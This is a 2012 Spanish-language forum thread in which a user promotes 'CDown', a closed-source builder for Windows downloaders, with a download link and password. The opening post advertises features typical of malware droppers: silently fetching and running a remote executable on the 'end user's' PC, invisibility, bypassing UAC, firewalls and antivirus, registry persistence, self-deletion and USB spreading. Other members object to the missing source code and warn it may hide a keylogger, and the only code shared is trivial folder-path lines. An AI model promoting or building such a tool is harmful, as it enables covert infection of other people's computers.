Autor Tema: CDown... by ¿CD? - Versión 6.0  (Leído 6484 veces)

CDiefenthaeler

• Bytes
  • *
    • Ver Perfil
    • ¿CDiefenthaeler?
CDown... by ¿CD? - Versión 6.0
« en: Julio 09, 2012, 11:05:55 am »
Para los que aún no sabéis la función de los downloaders es básicamente descargar y ejecutar un archivo desde un servidor web en el pc del usuario final.

Para usarlo simplemente subimos el archivo que queremos que se descargue y ejecute en la pc del usuario final a cualquier hosting web que soporte descarga directa de .exe ej: www.dropbox.com.

En donde dice "Descargar desde Url" colocamos la dirección completa donde se ubica nuestro archivo ej: wwww.ejemplo.com/carpeta/archivo.exe y donde dice "Nombre del archivo" colocamos el nombre completo del archivo ej: archivo.exe seleccionamos las opciones que más nos conviene y seguidamente damos click en "Generar ejecutable", el archivo creado sera el archivo que se enviará al usuario final.

Cuando sea ejecutado, se descargara el archivo "archivo.exe" desde nuestro servidor web en la carpeta que hayas elegido previamente, apenas termine de descargarse se ejecutará.

El ejecutable generado a pesar de la cantidad de funciones que posee pesa muy poco y se caracteriza por su excelente estabilidad, velocidad y indetectabilidad.

Capturas de pantalla:

Vídeo:

[youtube]http://www.youtube.com/watch?v=ymzOnqlMXVA&feature=player_embedded[/youtube]

Caracteristicas:

CDown...:

•Compatible con windows XP, Vista y Seven - (32 y 64 bits)

•Peso del CDown...: 2,64 MB sin comprimir

Ejecutable generado:

•Compatible con windows XP, Vista y Seven - (32 y 64 bits)

•Totalmente invisible para el usuario

•Saltea la UAC de Windows Vista y Seven

•Saltea los firewalls y antivirus

•Mutex

•Peso del ejecutable generado: 44,0 KB sin comprimir

Opciones;

•Se copia en algunos directorios del sistema

•Se alto elimina

•Se agrega al registro de Windows

•Se propaga por USB

Link para la descarga: http://adf.ly/AUHoY

Contraseña: ¿CD?

Salu2... A Todos...

ssccaann43

• Terabyte
    • Ver Perfil
    • Sistemas Nuñez, Consultores y Soporte, C.A.
Re:CDown... by ¿CD? - Versión 6.0
« Respuesta #1 en: Julio 09, 2012, 05:35:03 pm »
Esta sección es para Desarrollo - Source - Codigo Libre - Fuentes, si no publicas el Source, no va aquí...!
Edited:
Publicaras el source?
« última modificación: Julio 09, 2012, 07:40:25 pm por xkiz ™ »
Miguel Núñez.

xkiz ™

• Moderador Global
  • Gigabyte
    • Ver Perfil
    • xkiz ™
« Respuesta #2 en: Julio 09, 2012, 07:28:08 pm »
estoy de acuerdo con @ssccaann43, asi que movi el tema a aqui, hasta que Leandro decida donde ponerlo....

YAcosta

• Moderador Global
  • Exabyte
  • Daddy de Qüentas y QüeryFull
    • Ver Perfil
    • Personal
« Respuesta #3 en: Julio 10, 2012, 12:39:03 am »
la verdad no es gran cosa, el ucDownloader de cobein haría exactamente lo mismo y tenemos el código, puliendo aqui y alla en media hora tenemos lo mismo.
Me encuentras en YAcosta.com

CDiefenthaeler

• Bytes
  • *
    • Ver Perfil
    • ¿CDiefenthaeler?
« Respuesta #4 en: Julio 10, 2012, 10:51:42 am »
Esta sección es para Desarrollo - Source - Codigo Libre - Fuentes, si no publicas el Source, no va aquí...!

No sabia donde ponerlo. Cuando libere el source ya lo se. Gracias...

estoy de acuerdo con @ssccaann43, asi que movi el tema a aqui, hasta que Leandro decida donde ponerlo....

Gracias...

la verdad no es gran cosa, el ucDownloader de cobein haría exactamente lo mismo y tenemos el código, puliendo aqui y alla en media hora tenemos lo mismo.

Buenooo... Bueno, la misma cosa no lo haria y en media hora puedes pulir lo que quieres que no puedes hacer lo mismo. Al menos en media hora no.

La aplicación lleva sus detalles y eso son horas... Y una cosita más lo que para ti no es gran cosa, para otros es bastante.

Salu2...

YAcosta

• Moderador Global
  • Exabyte
  • Daddy de Qüentas y QüeryFull
    • Ver Perfil
    • Personal
« Respuesta #5 en: Julio 10, 2012, 01:55:12 pm »
Claro, para otros puede ser maravilloso pero siempre hablo por mi no por todos, así que igual me parece que no es gran cosa. Igual no lo considero un aporte porque este es un foro de programación, si das solo el exe NO SABEMOS que cosa mas estás haciendo en tu aplicativo, incluso lo puedo considerar peligroso, cuando publiques el code (no estas obligado) entonces tu aporte si será coherente con este foro.

Y me ratifico con el tiempo, no se hace en media hora, se hace en 15 minutos y exagerando, no es porque yo sea genio, sino porque como dije ya existe código de eso aqui en el foro, solo hay que buscarlo (ucDownload de Cobein), ponerle un textbox y un botón, invocarlo y listo, es tan fácil que ni lo haré, pero si deseas con todo gusto te paso el código ya que actualmente lo uso.

OJO!!! Obviamente hablo de la funcionalidad, no de los adornos que le pusiste, eso si toma tiempo, eso si te concedo que toma horas, pero en gustos y colores no han escrito los... programadores.

Saludos
Me encuentras en YAcosta.com

pedroesca

• Megabyte
  • "El conocimiento es libre"
    • Ver Perfil
« Respuesta #6 en: Julio 10, 2012, 02:41:09 pm »
Coinicido totalemente con Iván y ssccaann43, sino, con que objeto publicarías solo un "ejecutable" de un programita que se conecta a internet?????

Saludos!
"Si yo tengo una idea, tú otra, y la compartimos, ambos tendremos DOS ideas"

ssccaann43

• Terabyte
    • Ver Perfil
    • Sistemas Nuñez, Consultores y Soporte, C.A.
« Respuesta #7 en: Julio 10, 2012, 04:11:25 pm »
En el buen sentido de la palabra, no te sientas ofendido, simplemente que si no muestras sources realmente no nos interesa saber ni pa que sirve... Aunque lo detalles y lo expliques dudo que lo bajemos para probarlo o usarlo... Este es un foro donde todos nos conocemos, mantenemos una comunicación constante y compartimos nuestros sources para apoyar a quienes lo necesiten...

De igual manera gracias por el aporte...!
Miguel Núñez.

LeandroA

• Administrador
  • Petabyte
    • Ver Perfil
« Respuesta #8 en: Julio 10, 2012, 09:10:08 pm »
Hola, si definitivamente si no hay source va aca en el general, pero igualmente se agradece la contribucion, hay casos en los que uno quiere guardarse el codigo de fuente para uno, ahora bien no lo puede probar ya que estoy en el trabajo y no puedo ejecutar nada raro.

si me gustaria o me intriga si es posible y si puedes compartir el codigo, como se copia en una carpeta del sistema, si la cuenta de usuario en la que se ejecute el programa no es administrador y en caso de que lo sea como salta la proteccion.

Saludos.

lucius

• Gigabyte
    • Ver Perfil
« Respuesta #9 en: Julio 11, 2012, 02:17:35 am »
Si tu software hace lo que mencionas esta buenazo aunque asi como estan las cosas "aunque funcione y espero que si lo haga, seguro tiene minimo su keyloger, es mi opinion". Recomiendo que alguien del foro lo pruebe y revise eso ya que otros usuarios que pasan algunas veces por el foro simplemente lo descarguen y luego se lleven una ingrata sorpresa y como este foro tiene bastante credibilidad o mejor dicho hay gente buena onda pensaran que no hay mala intencion. La verdad que esa bueno tu aporte pero siempre hay que estar alerta con este tipo de programas sobre todo cuando simplemente se muestra el exe.

CDiefenthaeler

• Bytes
  • *
    • Ver Perfil
    • ¿CDiefenthaeler?
« Respuesta #10 en: Julio 11, 2012, 03:50:36 pm »
Si me gustaria o me intriga si es posible y si puedes compartir el codigo, como se copia en una carpeta del sistema, si la cuenta de usuario en la que se ejecute el programa no es administrador y en caso de que lo sea como salta la proteccion.

Cuando libere el source seguramente lo haré aquí y buenooo, las rutas de las carpetas del sistema las he puesto así:

AppData = Environ("appdata") & "\" & "archivo.exe"

Desktop = "C:\Users\" & Environ("username") & "\desktop\" & "archivo.exe"

Temp = Environ("temp") & "\" & "archivo.exe"

Bueno, me detecta el usuario y ya esta.

Salu2...

Si tu software hace lo que mencionas esta buenazo aunque asi como estan las cosas "aunque funcione y espero que si lo haga, seguro tiene minimo su keyloger, es mi opinion". Recomiendo que alguien del foro lo pruebe y revise eso ya que otros usuarios que pasan algunas veces por el foro simplemente lo descarguen y luego se lleven una ingrata sorpresa y como este foro tiene bastante credibilidad o mejor dicho hay gente buena onda pensaran que no hay mala intencion. La verdad que esa bueno tu aporte pero siempre hay que estar alerta con este tipo de programas sobre todo cuando simplemente se muestra el exe.

Buenooo..., la verdad es q si hace todo lo que menciono y no, no lleva ni virus, ni troyanos, o sea esta limpita la aplicación. Y si, está bien q la analizen así se darán cuenta q esta limpia.

Salu2...

xkiz ™

• Moderador Global
  • Gigabyte
    • Ver Perfil
    • xkiz ™
« Respuesta #11 en: Julio 11, 2012, 07:01:43 pm »
Desktop = "C:\Users\" & Environ("username") & "\desktop\" & "archivo.exe"

forma rara de obtener el desktop, en mi caso no funcionaria, yo tengo los directorios cambiados de lugar, ese path no existe en mi PC.
para obtener los directorios del sistema como el Desktop o documentos,musica, imagenes, etc tenes que ir al registro de windows. por que si como en mi caso el sistema esta instalado el otra particion, "D, E, F, etc" ya eso no te sirve. porr eso lo del registro.
como asi tambien el OS en una particion y las carpetas en otra particion...
« última modificación: Julio 11, 2012, 07:03:46 pm por xkiz ™ »

seba123neo

• Terabyte
    • Ver Perfil
« Respuesta #12 en: Julio 11, 2012, 07:32:57 pm »
es que nunca hay que usar path fijos, menos para obtener la ruta de una carpeta de windows especial que puede cambiar de ubicacion o de idioma, se debe recurrir a apis o al registro, esa te tiran la verdadera ruta, por mas que sea en español o sea chino el windows te va a funcionar.

por lo que pude ver del .exe parece no ser un virus ni nada de eso, tiene algunas URL raras, y referencias al flashplayer que no se para que lo usa. les puedo tirar el detalle completo si quieren.

E N T E R

• Petabyte
  • www.enterpy.com
    • Ver Perfil
    • www.enterpy.com
« Respuesta #13 en: Julio 11, 2012, 08:14:01 pm »
por lo que pude ver del .exe parece no ser un virus ni nada de eso, tiene algunas URL raras, y referencias al flashplayer que no se para que lo usa. les puedo tirar el detalle completo si quieren.

No es por nada solo por curiosidad.  Ponelo, y si podes poner algún ejemplo de como haces eso de los detalles

Saludos...
CIBER GOOGLE - CONCEPCIÓN PARAGUAY
www.enterpy.com
Primera regla de la programacion, para que vas a hacerlo complicado si lo puedes hacer sencillo